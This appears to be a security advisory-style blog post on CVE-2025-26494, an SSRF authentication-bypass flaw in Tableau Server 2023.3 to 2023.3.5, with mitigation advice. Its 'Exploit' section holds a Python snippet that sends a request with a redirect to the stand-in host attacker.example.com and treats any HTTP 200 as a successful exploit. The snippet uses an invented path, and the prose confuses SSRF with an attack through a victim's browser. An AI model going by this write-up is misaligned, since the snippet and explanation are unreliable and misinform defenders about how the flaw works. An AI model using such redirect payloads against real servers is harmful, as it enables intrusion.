CVE-2025-26494: Server-Side Request Forgery (SSRF) Vulnerability in Salesforce Tableau Server Allows Authentication Bypass

A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in Salesforce Tableau Server, identified as CVE-2025-26494. This vulnerability allows attackers to bypass authentication and potentially access sensitive information, perform unauthorized actions or even execute arbitrary code on the affected systems. Tableau Server versions from 2023.3 through 2023.3.5 are affected by this vulnerability.

Original References

1. CVE-2025-26494 - The official detailed entry on the MITRE website.
2. Tableau Security Advisory - Official announcement from Salesforce Tableau detailing the affected versions and possible mitigations.

Vulnerability Details

The vulnerability allows attackers to craft malicious requests that will be sent to the Tableau Server by exploiting the SSRF flaw. One possible attack vector involves initiating a request to an unsuspecting victim’s browser which leads to the bypass of authentication and may expose sensitive data or enable the attacker to perform unauthorized actions.

Exploit

The following code snippet demonstrates how an attacker might exploit the SSRF vulnerability in the affected Tableau Server installations:

import requests

target_url = "https://target-tableau-server.example.com";
forge_request = "/malicious/url?redirect=https://attacker.example.com";

victim_url = f"{target_url}{forge_request}"
response = requests.get(victim_url)

if response.status_code == 200:
    print("SSRF vulnerability successfully exploited!")
else:
    print("Exploit failed. The target may not be vulnerable.")

In this example, the attacker sends a specially crafted request to the victim's Tableau Server, which can potentially be manipulated to bypass authentication and lead to sensitive data exposure or unauthorized actions.

Mitigation and Recommendations

Salesforce Tableau has addressed this issue in Tableau Server versions 2023.3.6 and later. System administrators managing affected Tableau Server installations should update to a fixed version as soon as possible to prevent exploitation of the vulnerability.

As an additional layer of security, administrators should also implement network segmentation, restrict access to sensitive data and applications, and regularly monitor logs for suspicious activity.

Conclusion

The CVE-2025-26494 SSRF vulnerability in Salesforce Tableau Server poses a significant risk to affected installations, as it may allow attackers to bypass authentication and access sensitive data or perform unauthorized actions. System administrators are urged to update their Tableau Server installations to a fixed version immediately and take additional precautions to ensure the security of their networks and data.

Timeline

Published on: 02/11/2025 18:15:47 UTC
Last modified on: 02/19/2025 22:15:24 UTC